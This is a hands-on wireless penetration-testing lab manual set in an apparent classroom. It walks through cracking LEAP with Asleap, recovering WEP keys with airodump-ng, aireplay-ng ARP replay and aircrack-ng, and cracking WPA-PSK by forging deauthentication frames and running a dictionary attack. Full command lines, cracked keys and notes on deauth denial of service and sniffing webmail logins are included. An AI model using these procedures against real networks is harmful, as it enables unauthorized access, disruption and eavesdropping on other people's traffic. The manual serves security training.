Section 4 Cracking 802.11 Encryption and Authentication In the previous section we showed the vulnerabilities of Open Wireless LANs. In this section we ll show some of the techniques and tools used to break the wireless encryption. Once you have cracked the encryption, you can use all the tools from the previous section to see what everyone is doing. Some of these techniques are specific to vendor and protocol specific attacks. We ll use both Windows and Linux tools to crack encryption and authentication! 1/12/11 1 www.inpnet.org www.hotlabs.org
LAB 4.1: LEAP Cracking- Asleap/Pre-Hashed Dictionary File The purpose of this lab is to learn how to break Encryption and Authentication methods used in securing wireless networks. WEP encryption used for confidentiality and integrity on a wireless LAN utilizes a weak implementation of RC4 encryption. The RC4 keys initialization vector s generated by a WEP Network connection are weak and therefore able to be cracked. In order to successfully crack WEP 800,000 to 1,000,000 WEP encrypted frames must be captured. In this lab you will capture and crack a WEP key. WPA-PSK uses a passphrase for authenticating wireless clients to the network. The WPA passphrase is an 8-63 ascii character text string that is used to authenticate wireless users. The WPA passphrase is susceptible to a dictionary attack and this lab will show you how to capture and crack a WPA key. LEAP authentication is a Cisco proprietary mechanism to allow users to connect to a wireless network using a username and a password. The username is sent in cleartext and the password is hashed to protect it in transit on the wireless network. The hashing of the password can be broken with a tool called Asleap. Product Information Source Omnipeek PersonaL Free http://wildpackets.com Asleap http://asleap.sourceforge.net/ Where, When, Why Requirements / Dependencies You have already learned how to capture passwords, web traffic, email content, and sniff open wireless networks. But most enterprise class wireless LAN s implement some form of encryption and authentication. Some of those security mechanisms are weak and therefore susceptible to attack. A wireless pen tested must know how to identify those threats and know the susceptibility of the network to attack. Also, it is necessary to be able to perform the cracks to illustrate to a customer the weaknesses of the wireless network security. Omnipeek Personal Wireshark Airpcap USB adapter 1/12/11 2 www.inpnet.org www.hotlabs.org
Aircrack Tamosoft Commview Aireplay Nokia N800 wireless client CoWPAtty Asleap Large Dictionary file Running an ASLEAP Crack against a LEAP Authentication Step 1. Step 2. Step 3. Step 4. Step 5. Step 6. Step 7. Prepare to Capture the LEAP authentication with Omnipeek. Instructor will tell you went to start the capture and on what channel. Start your capture to catch the LEAP conversation. Save capture file as a TCP Dump file. Open a command prompt. Change to the Asleap directory. Run Asleap against the capture file using the pre hashed dictionary. 1/12/11 3 www.inpnet.org www.hotlabs.org
Lab 4.2: WEP Cracking and Acceleration Aircrack-ng is used to statically attack traffic gathered by WEP encrypted wireless routers in order to crack the WEP key used. It can also be used to brute-force WPA keys. Once these keys are cracked then one can associate with the access point as a legitimate user. Product Information Source http://www.aircrack-ng.org Free / Open Source (GPL, MPL) http://www.aircrack-ng.org Where, When, Why Usage and Features Requirements / Dependencies Attack This tool is designed to recover/crack WEP keys and/or WPA keys Recover/crack WEP or WPA keys Linux or Windows operating system Captured traffic of target access point Time 1/12/11 4 www.inpnet.org www.hotlabs.org
Lab Part 1 - Using Airodump-ng, Aircrack-ng and Aireplay-ng to quickly crack a WEP key What you will do in this lab: Use Airodump-ng to find a target Capture encrypted traffic Use aireplay-ng to accelerate IV collection time Recover the WEP key using a statistical attack using aircrack-ng Step 1. Step 2. Configure your access point for a 64-bit WEP key of 009E4DD7E8 and have your N800 act as a client and connect to your access point. In this tutorial the access point SSID is LinksysL but yours will be as assigned earlier. Start hitcast on your N800 s to generate traffic.launch Airodump-ng to view your access point and N800 as potential targets../ath_monitor ß to set your card in monitor mode airodump-ng ath0 1/12/11 5 www.inpnet.org www.hotlabs.org
We see plenty of potential targets that are encrypted a few of which have authenticated wireless clients with traffic. Step 3. Step 4. Once you have located the N800 s traffic on your network we need to switch channels to monitor only that channel. My 'linksysl' access point is on channel 6 as should yours by default. airodump-ng -w /tmp/linksysl_traffic -channel 6 ath0 Now we can see that we are just on channel 6 and that we have one wireless station (00:13:46:9F:AC:36) that is connected to the access point linksysl. Since we are dumping into a capture file, everything that our card can see will be logged. The Data packets are what are of interest to us when cracking WEP keys; the more you collect the less time it takes to statistically attack and recover the key. With only 1 client authenticated and little traffic, it will take a long time to collect these packets (we will see how using a replay attack this can be dramatically decreased). Step 5. Now you wait! As each unique initialization vector (IV) is collected (indicated by the increase in #Data packets) you get closer to having enough IV's to send to aircrack-ng to be attacked. But you have probably noticed that it can take a very long time to collect enough IV s to crack the key right? For a 64 bit you want anywhere from 300,000 to 700,000 unique IV's and for 128 bit and higher then you want 1 million or higher. So we need to find a way to generate a lot more traffic so that we can collect IV s faster; we can do so with aireplay-ng. From a command prompt type: Aireplay-ng -3 -b 00:18:39:C8:F3:0F -h 00:13:46:9F:AC:36 ath0 Where b is YOUR ACCESS POINT MAC and h is YOUR N800 s MAC It is telling aireplay that you want to launch a type 3 attack. Which is an ARP replay attack in which an ARP packet is picked out of the air and 1/12/11 6 www.inpnet.org www.hotlabs.org
'replayed' or constantly thrown back at the router causing the router to respond with traffic in the form of an ARP reply. 312,631 unique IV's should be enough for us to start an attack against a 64 bit key, so let's start. (You have no idea how strong the key will be so a good rule is always start with the least and move up. We can specify the guessed key strength with the -n switch). Step 6. aircrack-ng /tmp/linksysl_traffic*.cap -n 64 This will give you a list of all the networks where data has been collected. Since we didn't supply the -IVs switch, it collected all traffic instead of just the IVs. We see that we have 357,169 IVs for the linksysl network. Just type 5 in to select that network and the script will do the rest. 1/12/11 7 www.inpnet.org www.hotlabs.org
Since we had enough IVs it only took 18 seconds to recover the 64 bit key used. 00:9E:4D:D7:E8 Step 7. Now you can connect to the target access point as a legitimate user. What you learned in this Lab: In this Lab you learned to use Product to: Pick a WEP enabled wireless access point as a target Collected unique IVs Statistically attacked the IVs in order to recover the WEP key 1/12/11 8 www.inpnet.org www.hotlabs.org
Lab 4.3: WPA Cracking Aircrack-ng can also be used to brute-force WPA Pre-Shared Keys (PSK). Once these keys are cracked then one can associate with the access point as a legitimate user. Product Information Source http://www.aircrack-ng.org Free / Open Source (GPL, MPL) http://www.aircrack-ng.org Where, When, Why Usage and Features Requirements / Dependencies Attack This tool is designed to recover/crack WEP keys and/or WPA keys Recover/crack WEP or WPA keys Linux or Windows operating system Captured traffic of target access point Time 1/12/11 9 www.inpnet.org www.hotlabs.org
What you will do in this lab: Use Airodump-ng to find a target Capture encrypted traffic Use aireplay-ng to deauth a client Recover the WPA key using aircrack-ng Lab Part 1 - Using Airodump-ng, Aireplay-ng, and Aircrack-ng to crack a WPA key Step 0 - Configure your access point with a WPA-PSK key of applesauce and have your N800 act as a client and connect to your access point. In this tutorial the access point SSID is LinksysL but yours will be as assigned earlier. Start hitcast on your N800 s to generate traffic. Step 8. Step 9. Launch Airodump-ng to find your access point and N800 as potential targets (making sure we log to a capture file so that we can capture the 4-Way handshake). airodump-ng -w /tmp/wpa_linksysl channel 6 ath0 1/12/11 10 www.inpnet.org www.hotlabs.org
Step 10. Step 11. Noticing that our linksysl network has now switched to WPA with TKIP cipher, our previous WEP type attack where we collect unique IVs is no longer useful to us. In order to crack a WPA key, we need to see the EAPOL 4-Way handshake that takes place at the very beginning of the association with the access point; obviously we have missed that as a client is already associated with the access point. We have 2 options: 1 Wait for someone else (or the same client) to associate and authenticate with the access point. 2 Force the already-associated client to disconnect and re-connect using a forged deauth packet. For sake of time we will use the 2 nd option; forging a deauthenticate packet using the aireplay-ng tool. aireplay-ng -0 30 -a 00:18:39:C8:F3:0F -c 00:13:46:9F:AC:36 ath0 where a is your ACCESS POINT MAC and c is YOUR n800 MAC This will launch a deauth attack against the wireless client forcing them to reauthenticate therefore allowing us to sniff for the 4-Way handshake. Step 12. Step 13. Use aircrack-ng to verify that we have actually collected the 4-Way handshake. aircrack-ng -w /root/wordlist.txt /tmp/*.cap 1/12/11 11 www.inpnet.org www.hotlabs.org
(This time we give it a large dictionary file to brute-force with). Step 14. Step 15. Seeing that we have collected the handshake, we choose the target network (3) and let the cracking phase take place. Now you wait! The time it takes will depend on the key length and complexity, the speed of your computer(s), and the size of your dictionary file. 1/12/11 12 www.inpnet.org www.hotlabs.org
Lab 4.4: Aircrack-ng Aircrack-ng is used to statically attack traffic gathered by WEP encrypted wireless routers in order to crack the WEP key used. It can also be used to brute-force WPA keys. Once these keys are cracked then one can associate with the access point as a legitimate user. Product Information Source http://www.aircrack-ng.org Free / Open Source (GPL, MPL) http://www.aircrack-ng.org Where, When, Why Usage and Features Requirements / Dependencies Attack This tool is designed to recover/crack WEP keys and/or WPA keys Recover/crack WEP or WPA keys Linux or Windows operating system Captured traffic of target access point Time 1/12/11 13 www.inpnet.org www.hotlabs.org
What you will do in this lab: Use Airodump-ng to find a target Capture encrypted traffic Recover the WEP key Lab Part 1 - Using Aircrack-ng to crack a WEP key Step 1. Step 2. Launch Airodump-ng to view potential targets. (It is not necessary to log to a file at this point or choose a channel because we don't know anything about our target yet). airodump-ng ath0 (run the ath_monitor script if you need set your card in monitor mode first). We see plenty of potential targets that are encrypted a few of which have authenticated wireless clients with traffic. 1/12/11 14 www.inpnet.org www.hotlabs.org
Step 3. Step 4. Pick your target and switch channels to monitor only that channel. For this tutorial I will use the 'linksysl' access point that is encrypted with WEP and on channel 6. airodump-ng -w /tmp/linksysl_traffic -channel 6 ath0 Now we can see that we are just on channel 6 and that we have one wireless station (00:13:46:9F:AC:36) that is connected to the access point linksysl. Since we are dumping into a capture file, everything that our card can see will be logged. The Data packets are what are of interest to us when cracking WEP keys; the more you collect the less time it takes to statistically attack and recover the key. With only 1 client authenticated and little traffic, it will take a long time to collect these packets (we will see how using a replay attack this can be dramatically decreased). Step 5. Step 6. Now you wait! As each unique initialization vector (IV) is collected (indicated by the increase in #Data packets) you get closer to having enough IV's to send to aircrack-ng to be attacked. Once you have enough then you can point the capture file at aircrack for cracking. For a 64 bit you want anywhere from 300,000 to 700,000 unique IV's and for 128 bit and higher then you want 1 million and/or higher. 312,631 unique IV's should be enough for us to start an attack against a 64 bit key, so let's start. (You have no idea how strong the key will be so a good rule is always start with the least and move up. We can specify the guessed key strength with the -n switch). Step 7. 1/12/11 15 www.inpnet.org www.hotlabs.org
aircrack-ng /tmp/linksysl_traffic*.cap -n 64 This will give you a list of all the networks where data has been collected. Since we didn't supply the -IVs switch, it collected all traffic instead of just the IVs. We see that we have 357,169 IVs for the linksysl network. Just type 5 in to select that network and the script will do the rest. Since we had enough IVs it only took 18 seconds to recover the 64 bit key used. 00:9E:4D:D7:E8 Step 1. Now you can connect to the target access point as a legitimate user. What you learned in this Lab: In this Lab you learned to use Product to: Pick a WEP enabled wireless access point as a target Collected unique IVs Statistically attacked the IVs in order to recover the WEP key 1/12/11 16 www.inpnet.org www.hotlabs.org
Lab Part 2 - Using Aircrack-ng to crack a WPA key What you will do in this lab: Use airodump-ng to find a target Capture encrypted traffic Recover the WPA key Step 1. Step 2. Launch Airodump-ng to find potential targets (making sure we log to a capture file so that we can capture the 4-Way handshake). airodump-ng -w /tmp/wpa_linksysl channel 6 ath0 Step 3. Noticing that our linksysl network has now switched to WPA with TKIP cipher, our previous WEP type attack where we collect unique IVs is no longer useful to us. In order to crack a WPA key, we need to see the EAPOL 4-Way handshake that takes place at the very beginning of the association with the access point; obviously we have missed that as a client is already associated with the access point. We have 2 options: 1 Wait for someone else (or the same client) to associate and authenticate with the access point. 1/12/11 17 www.inpnet.org www.hotlabs.org
2 Force the already-associated client to disconnect and re-connect using a forged deauth packet. Step 4. For sake of time we will use the 2 nd option; forging a deauthenticate packet using the aireplay-ng tool that is a part of the aircrack-ng suite. aireplay-ng -0 30 -a 00:18:39:C8:F3:0F -c 00:13:46:9F:AC:36 ath0 This will launch a deauth attack against the wireless client forcing them to reauthenticate therefore allowing us to sniff for the 4-Way handshake. Step 5. Step 6. Use aircrack-ng to verify that we have actually collected the 4-Way handshake. aircrack-ng -w /tmp/wordlists/ large_dictionary_file.txt /tmp/wpa_linksysl*.cap (This time we give it a large dictionary file to brute-force with). Step 7. Step 8. Seeing that we have collected the handshake, we choose the target network (3) and let the cracking phase take place. Now you wait! The time it takes will depend on the key length and complexity, the speed of your computer(s), and the size of your dictionary file. The supplied dictionary file is very large. 1/12/11 18 www.inpnet.org www.hotlabs.org
Step 9. We have the WPA key! 'security' was the word used as the key. Now we can authenticate with the access point as a regular user. 1/12/11 19 www.inpnet.org www.hotlabs.org
Lab 4.5: Aireplay-ng Aireplay-ng is a utility used to dramatically decrease the time it takes to collect enough data in order to crack a WEP key or forge deauthentication frames to cause a DoS attack. Product Information Source http://www.aircrack-ng.org GPL http://www.aircrack-ng.org/ Where, When, Why Usage and Features Attack It can take a lot of valuable time to collect enough data on a WEP enabled wireless network in order to crack a WEP key; time that Joe IT might not have in order to conduct his penetration test. Aireplay-ng will allow Joe to dramatically reduce the time it takes in order to break into a WEP enabled access point so that he can spend more time focusing on other weaknesses of the client network. Different attack modes Can use live captured packets, forged packets, or archived packets Requirements / Dependencies Linux operating system patched drivers for supported wireless card supported wireless card What you will do in this lab: Find a WEP enabled access point Launch a replay attack 1/12/11 20 www.inpnet.org www.hotlabs.org
Lab Part 1 - Using Aireplay-ng to sped up IV collection time Step 1. Step 2. Become root by typing su at a command prompt and type in the root password. Launch airodump-ng in order to view target access points. Step 3. Step 4. Step 5. Step 6. Find the target access point and switch airodump-ng to monitor only that channel. We will use linksysl on channel 6. airodump-ng -w /tmp/linksysl_capture -channel 6 ath0 Now there is not a lot of traffic so we will be here for a long time collecting enough IVs in order to launch an attack against the WEP key. Launching a replay attack will help fix that. Aireplay-ng -3 -b 00:18:39:C8:F3:0F -h 00:13:46:9F:AC:36 ath0 It is telling aireplay that you want to launch a type 3 attack. Which is an ARP replay attack in which an ARP packet is picked out of the air and 1/12/11 21 www.inpnet.org www.hotlabs.org
'replayed' or constantly thrown back at the router causing the router to respond with traffic in the form of an ARP reply. The -b switch is the MAC address of the router, -h is the MAC address of an authenticated client and then we supply the interface from which the replay attack will be launched. Step 7. At this rate the amount of time it will take is dramatically less and we can soon send our packets off to aircrack-ng to be cracked. Overall it took us about 10 minutes to collect the amount of traffic (128332 packets as seen in the picture above) that otherwise would have us sitting around for weeks. NOTE: See the attached video created by muts of Backtracks entitled Clientless WEP Cracking for a demonstration on how to crack a WEP key of an access point with no connected clients as well as the Cracking WEP in 10 minutes to see aireplay in action. What you learned in this Lab: In this Lab you learned to use Product to: 1. Speed up an attack against a WEP enabled access point 1/12/11 22 www.inpnet.org www.hotlabs.org
Lab Part 2 - Using Aireplay-ng to deauthenticate a client What you will do in this lab: Locate a wireless client and forge a deauthenticate packet to force a disconnection/reconnection Step 1. Step 2. Become root by typing su at a command prompt and type in the root password. Launch airodump-ng in order to view possible targets by typing: airodump-ng ath0 Step 3. Choose the client that you would like to deauthenticate and forge a deauth packet using aireplay-ng -0 attack. -b supplies the bssid of the access point and it is always more effective if you supply the -c station switch otherwise it will send to broadcast and that is not very reliable. 1/12/11 23 www.inpnet.org www.hotlabs.org
Step 4. aireplay -0 10 -b 00:18:39:C8:F3:0F -c 00:13:46:9F:AC:36 ath0 If successful this attack will force the station 00:13:46:9F:AC:36 to disconnect. This is useful in a denial of service attack, for sniffing for the EAPOL 4-Way handshake, or other credentials that might be passed at the beginning of a session. 1/12/11 24 www.inpnet.org www.hotlabs.org
Lab 4.6: Airodump-ng Airodump is a wireless discovery utility that will display all access points within range of your wireless card as well as signal strength, encryption status, wireless clients in the area, and log all information gathered to a packet capture file for analysis. Product Information Source http://www.aircrack-ng.org Free / Open Source (GPL, MPL) http://www.aircrack-ng.org Where, When, Why Network Analysis Joe IT would use this tool when he needs an idea of what access points are in the area and who is connecting to these access points, how much traffic is moving on the network, what access points clients are probing for, and what type of encryption is used on the networks. He can also very easily use this tool to log captured network traffic to a file. Usage and Features Display Access Points / Wireless Networks in range Displays encryption types used by the wireless networks Shows wireless clients that are probing for or associated with which ap logs captured traffic to a capture file Requirements / Dependencies Linux or Windows operating system Wireless card with supported chipset (the ubiquity card has the supported atheros based chipset) Where to Go for More Information http://www.aircrack-ng.org 1/12/11 25 www.inpnet.org www.hotlabs.org
What you will do in this lab: View wireless traffic in range Log traffic to a capture file Step 5. Step 6. Put card into monitor mode by running the script ath_monitor at the command prompt. Launch airodump-ng with the appropriate parameters. Step 7. Step 8. Notice that we need to run this as root so type su followed by the root password. The parameters that need to be supplied can be seen in the picture above. A simple way to launch the application with logging to a file and hop all channels would be typed as follows: airodump-ng -w /tmp/capture_file ath0 Once that command is executed the screen will display all information that can be gathered in the area. 1/12/11 26 www.inpnet.org www.hotlabs.org
From the screenshot we can see in the top left hand corner we have the BSSID which is the MAC address of each access point that is in range. We then see the power or signal strength (usually a good indicator of how close it is), followed by the beacons that are being sent from the access point, the data that is airborne, channel, encryption type, and ESSID (SSID). If it is not broadcast then you will see a placeholder <length: <int>>. On the bottom we see wireless stations (wireless clients that are either associated to a certain access point or just in the area and probing). Step 9. Step 10. Since we didn't specify a channel as a parameter, we are hoping all channels. (Notice the CH variable in the top left changing?) You can specify a certain channel by stopping the script by clicking CTRL C and adding the --channel parameter: airodump-ng -w /tmp/capture_file -channel n ath0 Then you will only listen on channel n. To view the traffic that we have captured, open the capture file in your favorite protocol analyzer. For this purpose we will use Wireshark. At the command prompt type: wireshark /tmp/capture_file and look for interesting traffic. (More details about this will be giving as another lesson but as a quick example we can see that in our capture file we were able to watch someone login to their web based email account). 1/12/11 27 www.inpnet.org www.hotlabs.org
What you learned in this Lab: In this Lab you learned to use Product to: 2. Find MAC addresses of access points within range 3. Find broadcasted SSID's in range 4. Capture and view traffic of wireless networks 5. Find MAC address of wireless clients within range 6. Get an overall picture of the type of traffic happening on your target network 1/12/11 28 www.inpnet.org www.hotlabs.org